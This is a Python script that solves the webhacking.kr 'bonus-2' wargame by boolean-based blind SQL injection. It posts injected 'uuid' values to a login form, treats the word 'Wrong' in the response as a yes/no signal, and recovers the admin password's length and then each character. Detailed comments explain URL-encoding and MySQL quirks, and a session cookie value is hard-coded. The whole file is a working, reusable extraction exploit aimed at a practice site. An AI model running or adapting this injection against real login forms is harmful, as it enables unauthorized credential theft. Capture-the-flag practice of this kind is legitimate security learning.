
import requests

# Login endpoint of the webhacking.kr bonus-2 challenge; every probe below is a
# POST to this one URL.
url = "https://webhacking.kr/challenge/bonus-2/index.php"

# PHP session cookie sent with every probe. It is a live session identifier,
# i.e. a credential for whoever logged in: replace it with your own session and
# do not commit a real one.
cookie = {"PHPSESSID": "74obv0eti09jn2pn9di4eklsq4"}

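def _condition_holds(condition, *, timeout=10):
    """Ask the server whether *condition* is true for the admin row.

    Sends the login form with the injected ``uuid`` and a dummy password and
    treats a response page containing ``'Wrong'`` as "yes" (presumably the
    injected WHERE clause matched the admin row and only the dummy password
    was then rejected); any other page counts as "no".

    Args:
        condition: SQL boolean fragment placed after ``admin' and``; the
            trailing ``#`` comments out the remainder of the server's query.
            This is attacker-authored text by design -- never feed it
            anything from an untrusted source.
        timeout: per-socket timeout in seconds so a hung connection cannot
            stall the whole extraction.

    Returns:
        True if the response text contains ``'Wrong'``, else False.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    payload = {'uuid': "admin' and {}#".format(condition), 'pw': '1'}
    # Unlike the GET-based challenge 21, the comment marker is a literal '#':
    # requests form-encodes the POST body, so it travels as %23 and PHP decodes
    # it back. Writing '%23' here would be double-encoded (%2523) and the SQL
    # comment would never take effect (easy to confirm in Burp Suite). In a GET
    # URL the opposite holds -- '#' is a reserved fragment delimiter and is not
    # encoded automatically, so there '%23' must be written by hand.
    res = requests.post(url, data=payload, cookies=cookie, timeout=timeout)
    return 'Wrong' in res.text


def find_pw_len(max_len=64, *, oracle=None):
    """Recover ``length(pw)`` of the admin row through the blind-SQLi oracle.

    Probes ``length(pw)=1``, ``=2``, ... in order and returns the first
    length the oracle confirms.

    Args:
        max_len: upper bound on the length probed. The previous version
            looped without bound and would spin forever on an expired
            session or a changed response page.
        oracle: ``callable(condition_sql) -> bool``; defaults to the live
            HTTP oracle ``_condition_holds``. Injecting one allows offline
            testing without touching the target.

    Returns:
        The password length as an int (>= 1).

    Raises:
        RuntimeError: if no length in ``1..max_len`` satisfies the oracle.
    """
    ask = _condition_holds if oracle is None else oracle
    for pw_len in range(1, max_len + 1):
        if ask("length(pw)={}".format(pw_len)):
            return pw_len
    raise RuntimeError(
        "password length not found in 1..{}; check the session cookie "
        "and the 'Wrong' oracle".format(max_len)
    )


def find_pw(max_len=64, *, oracle=None):
    """Recover the admin password one character at a time.

    First resolves the password length with :func:`find_pw_len`, then for
    each position tries every ASCII code 0..127 until the oracle confirms
    ``ascii(substr(pw, pos, 1)) = code``. The previous version computed the
    length but ignored it and always scanned 32 positions; beyond the real
    length ``substr`` yields ``''`` whose ``ascii()`` is 0, so it printed
    NUL characters for the padding positions.

    Each recovered character is printed on its own line (kept for
    compatibility) and the full password is also returned.

    Args:
        max_len: upper bound passed to :func:`find_pw_len`.
        oracle: ``callable(condition_sql) -> bool``; defaults to the live
            HTTP oracle ``_condition_holds``.

    Returns:
        The recovered password as a str.

    Raises:
        RuntimeError: if the length cannot be found, or if no ASCII code
            matches at some position (a sign the oracle is no longer
            reliable -- expired session, changed page, non-ASCII data).
    """
    ask = _condition_holds if oracle is None else oracle
    pw_len = find_pw_len(max_len, oracle=ask)
    chars = []
    for pos in range(1, pw_len + 1):
        for code in range(128):
            # ord() works identically to ascii() here. Comparing substr()
            # directly against the character instead of its code does NOT:
            # MySQL coerces the string side to a number, so a letter compares
            # equal to 0 and every letter "matches" at code 48 ('0').
            if ask("ascii(substr(pw,{},1))={}".format(pos, code)):
                print(chr(code))
                chars.append(chr(code))
                break
        else:
            raise RuntimeError("no ASCII character matched at position {}".format(pos))
    return ''.join(chars)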

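# Guard the entry point: importing this module must not fire a live blind
# SQL injection against the target; only running it as a script does.
if __name__ == "__main__":
    find_pw()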

